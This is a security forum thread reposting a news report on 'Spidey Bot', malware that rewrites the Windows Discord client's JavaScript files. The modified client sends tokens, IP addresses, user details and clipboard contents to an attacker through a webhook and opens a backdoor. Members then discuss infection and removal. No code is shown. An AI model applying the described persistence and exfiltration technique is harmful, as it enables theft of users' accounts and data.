DDE_Server

Level 21
Verified
Discord

A new malware is targeting Discord users by modifying the Windows Discord client so that it is transformed into a backdoor and an information-stealing Trojan.
The Windows Discord client is an Electron application, which means that almost all of its functionality is derived from HTML, CSS, and JavaScript. This allows malware to modify its core files so that the client executes malicious behavior on startup.
Discovered by researcher MalwareHunterTeam earlier this month, this malware is called "Spidey Bot" and when installed will add its own malicious JavaScript to the %AppData%\Discord\[version]\modules\discord_modules\index.js and %AppData%\Discord\[version]\modules\discord_desktop_core\index.js files.

Modified Discord index.js file
Modified Discord index.js file
The malware will then terminate and restart the Discord app in order for the new JavaScript changes to be executed.
Once started, the JavaScript will execute various Discord API commands and JavaScript functions to collect a variety of information about the user that is then sent via a Discord webhook to the attacker.
Executing commands
Executing commands
The information that is collected and sent to the attacker includes:
  • Discord user token
  • Victim timezone
  • Screen resolution
  • Victim's local IP address
  • Victim's public IP address via WebRTC
  • User information such as username, email address, phone number, and more
  • Whether they have stored payment information
  • Zoom factor
  • Browser user agent
  • Discord version
  • The first 50 characters of the victims Windows clipboard
The contents of the clipboard is especially concerning as it could allow the user to steal passwords, personal information, or other sensitive data that was copied by the user.

After sending the information, the Discord malware will execute the fightdio() function, which acts as a backdoor.
This function will connect to a remote site to receive an extra command to execute. This allows the attacker to perform other malicious activity such as stealing payment information if it exists, executing commands on the computer, or potentially installing further malware.
The backdoor component
The backdoor component
Researcher and reverse engineer Vitali Kremez who also analyzed the malware told BleepingComputer that the infection has been seen using file names such as "Blueface Reward Claimer.exe" and "Synapse X.exe". While it is not 100% sure how it is being spread, Kremez feels that the attacker is using Discord messaging to spread the malware.

As this infection shows no outward indication that it has been compromised, a user will have no idea they are infected unless they perform network sniffing and see the unusual API and web hook calls.

If the installer is detected and removed, the modified Discord files will still remain infected and continue to be executed each time you start the client. The only way to clean the infection will be to uninstall the Discord app and reinstall it so that the modified files are removed.

Even worse, after over two weeks, this Discord malware still only has 24/65 detections on VirusTotal.
 

DDE_Server

Level 21
Verified
I am very sad I am using it I will uninstall it any body has information to make sure if I am infected or not
I noticed it restarted by itself without opening it for update but I am suspect as it explained in the article that the infection occur after application relaunch :cry: :cry:
I will use Revo uninstaller to completely remove it with advanced options but what about the infections

I will install it again as article said to reset the modified enteries :cry: :cry:
 

upnorth

Moderator
Verified
Staff member
Malware Hunter
Here's another Electron based software. Maybe people will start pay attention but nah, doubtful.

 

RoboMan

Level 30
Verified
Content Creator
Malware Tester
I am very sad I am using it I will uninstall it any body has information to make sure if I am infected or not
I noticed it restarted by itself without opening it for update but I am suspect as it explained in the article that the infection occur after application relaunch :cry: :cry:
I will use Revo uninstaller to completely remove it with advanced options but what about the infections

I will install it again as article said to reset the modified enteries :cry: :cry:
It's important to know Discord hasn't been hacked. If you catch the malware, it will use Discord app as a mean. Having Discord installed, doesn't necessarily make you infected. You should have become infected with this malware previously, which spreading ways are yet unknown (probably via discord messages).
 
Last edited:

DDE_Server

Level 21
Verified
i we
It's important to know Discord hasn't been hacked. If you catch the malware, it will use Discord app as a mean. Having Discord installed, doesn't necessarily make you infected. You should have become infected with this malware previously, which spreading ways are yet unknown (probably via discord messages).
i will see the engine which detected it and use its free scanner
 

CyberTech

Level 32
Verified
I am very sad I am using it I will uninstall it any body has information to make sure if I am infected or not
I noticed it restarted by itself without opening it for update but I am suspect as it explained in the article that the infection occur after application relaunch :cry: :cry:
I will use Revo uninstaller to completely remove it with advanced options but what about the infections

I will install it again as article said to reset the modified enteries :cry: :cry:
I noticed it restarted by itself without opening it for update
Same here i thought it was my Windows 10 (1903) due to bugs or something until i read this ;/
 
Top